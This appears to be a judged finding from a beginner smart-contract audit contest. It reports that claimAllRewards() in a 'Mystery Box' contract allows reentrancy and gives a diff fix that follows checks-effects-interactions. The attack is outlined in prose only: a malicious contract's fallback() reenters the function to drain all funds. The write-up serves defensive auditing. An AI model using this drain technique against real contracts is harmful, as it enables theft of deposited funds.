Mystery Box

First Flight #25
Beginner FriendlyFoundry
100 EXP
View results
Submission Details
Severity: high
Valid

claimAllRewards() does not follow CEI, thus suffer of reentrancy issue

Summary

The function `claimAllRewards` suffers from reentrancy, meaning a malicious smart contract can reenter the functions and withdraw all funds.

Vulnerability Details

  1. a user deploys a malicious smart contract that will buy a box and open it until it gets one with a prize

  2. User call malicious smart contract to call claimAllRewards()

  3. The `fallback()` function of the malicious smart contract call claimAllRewards() until there is no more fund

Impact

Withdraw all funds from the protocol

Recommendations

Follow CEI :

function claimAllRewards() public {
uint256 totalValue = 0;
for (uint256 i = 0; i < rewardsOwned[msg.sender].length; i++) {
totalValue += rewardsOwned[msg.sender][i].value;
}
require(totalValue > 0, "No rewards to claim");
+ delete rewardsOwned[msg.sender];
(bool success,) = payable(msg.sender).call{value: totalValue}("");
require(success, "Transfer failed");
- delete rewardsOwned[msg.sender];
}
Updates

Appeal created

inallhonesty Lead Judge 9 months ago
Submission Judgement Published
Validated
Assigned finding tags:

`claimAllRewards` reentrancy

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.